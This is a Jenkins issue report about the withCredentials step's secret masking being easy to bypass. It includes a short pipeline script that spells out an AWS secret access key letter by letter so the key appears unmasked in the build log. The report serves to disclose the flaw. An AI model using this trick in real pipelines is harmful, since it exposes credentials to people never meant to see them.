Uploaded image for project: 'Jenkins'
  1. Jenkins
  2. JENKINS-50242

withCredentials step masking easily bypassed

    XMLWordPrintable

Details

    Description

      A very common use case of Jenkins is to delegate the responsibility of the creation of pipelines to third parties or developers. These external teams should be able to use secrets given to them via Jenkins credentials, but shouldn't be able to visualize the value of the secret.

      For this use case, withCredentials is broken:

      node {
        stage('Break Security') {
          withCredentials([string(credentialsId: 'AWS_DEFAULT_REGION', variable: 'AWS_DEFAULT_REGION'),
          string(credentialsId: 'AWS_ACCESS_KEY_ID', variable: 'AWS_ACCESS_KEY_ID'),
          string(credentialsId: 'AWS_SECRET_ACCESS_KEY', variable: 'AWS_SECRET_ACCESS_KEY')]) {
            def exposedSecret = ""
            for(letter in env.AWS_SECRET_ACCESS_KEY) {
              exposedSecret = "$exposedSecret $letter"
            }
            echo "$exposedSecret"
          }
        }
      }

      The secret can be easily viewed.

      Letting someone work on a pipeline is basically showing them the secrets that pipeline uses.
      For this example I used "Secret Text", but it also happens with "AWS Credentials".

      Attachments

        Issue Links

          Activity

            People

              Unassigned Unassigned
              apineros Andres Pineros
              Votes:
              0 Vote for this issue
              Watchers:
              5 Start watching this issue

              Dates

                Created:
                Updated:
                Resolved: